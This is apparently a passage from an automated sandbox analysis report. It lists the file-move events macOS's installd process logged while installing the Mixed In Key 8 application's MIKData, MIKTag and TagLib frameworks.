              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_qVu2hA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDatabase.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_BiP9EY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSmartCollection.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_wzB8vb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongWaveform.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_PRo9zc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKData.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_WUS3qQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongCollection.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_elhPLV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataCuePoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_ZKR85b -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSong.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_zwYT7R -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongEnergySegment.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_xPNoEw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataCollection.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_cKXVIi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongKeySegment.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/.BC.T_5CTIwR -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/MIKDataJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Modules/.BC.T_0x5Xyp -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Modules/module.modulemapJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_zPRief -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreAudio.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/_CodeSignature/.BC.T_Slc6Gh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/.BC.T_LnNzCu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/MIKTagJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/en.lproj/.BC.T_RKg5UL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/en.lproj/InfoPlist.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/.BC.T_ln4rGH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_ZjEp5t -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagCustomProperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_wGtegq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagErrors.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_3B76ri -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTag.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_SApVPu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagWAV.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_BZCg5q -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorCuePoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_L4dZLQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagUtil.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_c3QNvq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxCuePoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_kcy348 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagHeader.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_kEoGJk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagCopying.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_FY73l4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagComment.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_4YJ6Xa -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagMP4.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_Q6m2wK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxDatabase.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_7GEuz9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorTrack.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_L4nK2I -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagCuePoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_dYvNSu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagID3.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_dVe7pL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxTrack.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_LLjBM9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorPlaylist.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_HlQu0C -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagFLAC.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_eH9wOM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagAIFF.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_klvNpM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxQueue.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_wQM89R -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorDatabase.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_aUWN5g -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorQueue.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/_CodeSignature/.BC.T_dUy3dV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/.BC.T_R27kFH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/TagLibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_smBfZy -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/config.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_V22fs3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/riffutils.hJump to behavior
